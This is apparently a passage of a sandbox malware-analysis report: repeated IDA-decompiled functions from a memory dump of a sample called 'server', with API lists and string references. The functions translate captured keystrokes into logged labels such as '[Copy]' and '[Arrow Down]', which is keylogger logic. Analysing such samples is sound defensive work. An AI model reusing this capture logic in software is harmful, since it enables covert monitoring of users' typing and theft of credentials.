0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Accept], xrefs: 00C85A3A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C9C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C9C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Left]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c9c
0x00c85ca3
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Arrow Left], xrefs: 00C85C9E
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A05, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A05(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad -]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a05
0x00c85a0c
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Numpad -], xrefs: 00C85A07
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A7C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A7C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a7c
0x00c85a83
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Arrow Down], xrefs: 00C85A7E
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8596C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8596C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Copy]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8596c
0x00c85973
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Copy], xrefs: 00C8596E

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D76, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D76(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Right]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d76
0x00c85d7d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
